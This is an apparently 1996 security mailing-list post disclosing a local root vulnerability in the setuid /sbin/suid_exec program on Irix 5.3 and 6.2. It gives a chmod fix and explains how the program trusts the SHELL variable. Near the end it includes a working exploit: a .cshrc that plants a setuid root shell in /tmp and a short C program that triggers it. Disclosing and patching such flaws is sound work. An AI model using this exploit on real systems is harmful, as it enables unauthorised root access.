Irix: suid_exec hole
                                       
   Yuri Volobuev (volobuev@t1.chem.umn.edu)
   Mon, 2 Dec 1996 20:25:58 -0600
   
Howdy,

Yes, one more Irix root vulnerability, and yes, it's another suid program.

ABSTRACT

/sbin/suid_exec is owned by root and suid.  I don't know what it's supposed
to do, but it can be easily exploited by any local user to get root
priorities.  Exploit works on both 5.3 and 6.2 machines, it's part of
eoe.sw.unix and thus is installed on each and every machine.

FIX:

chmod -s /sbin/suid_exec

ERRATA

In my previous post, I mentioned that rfind subsystem is not part of Irix
6.2.  Apparently, as Jaechul Choe <poison@cosmos.kaist.ac.kr> mentioned,
it's there, though it's not part of "default" distribution, whatever it is.
It has same bugs 5.3 version does and is also vulnerable to all posted
exploits.

If you are busy, move on to your next message now.

Full Story.

If you think something like "it's getting too boring...", you are right.
I'm getting bored, too.  It's like beating dead horse.  Unlike SOD folks, I
don't have so much desire, I just hack Irix for fun, and it's no fun
anymore, so I think I'll stop, at least for some time.  I actually wasn't
going to hack suid_exec, either, but the name was just too attractive.

/sbin/suid_exec (/etc/suid_exec is a link to it) is a misterious program.
It's not known to me what it's supposed to do.  Man page is not there, and I
had no clue about what it actually does.  Trying to run it will not give one
anything, except errors.  So I got curious.  After some playing with system
call tracing and strings, I think I found what it does.  It checks argv[0]
(why?, for ownership and permissions, and if it's executable, it invokes
your default shell to parse that file.  If it's root-owned suid program,
suid_exec will not give up root priorities prior to execve.  So it can serve
as an interpreter for suid shell scripts.  Of course, by default all suid
executable files on Irix are ELF binaries, and when shell tries to parse
such a file all you get is errors, but...  Interesting point: it gets shell
name from SHELL environment variable.  Besides, it doesn't care what this
shell may do, and it may do a lot of interesting things, like executing dot
files.  There are many ways to exploit it, to my taste the easiest is

% setenv | grep SHELL
SHELL=/bin/tcsh
% mv ~/.cshrc ~/.cshrc.old
% cat > ~/.cshrc
cp /bin/sh /tmp
chmod a+rsx /tmp/sh
^D
% cat > expl.c
main()
{
  execl("/sbin/suid_exec","/bin/su","/bin/su",0);
}
^D
% cc expl.c -o expl.c
% ./expl
Too many ('s.
% ls -l /tmp/sh
-r-sr-sr-x    1 root     sys       140784 Dec  2 19:21 /tmp/sh*

(Sorry non-csh folks, I guess you get the pattern anyway).  Again, one can
get root out of it in a faster way, it's just one of the many.

I'm really curious: what is this thing doing on the system, anyway?  Getting
root out of it is seemingly its only use.  I just didn't find any reference
to it anywhere.  So may be removing suid bit from it will break something, I
don't know.  Nothing is in /etc/*/*.  I wish some SGI god followed
competitor's good example and explained us what it does.  But guess what are
the odds of it.

cheers,

yuri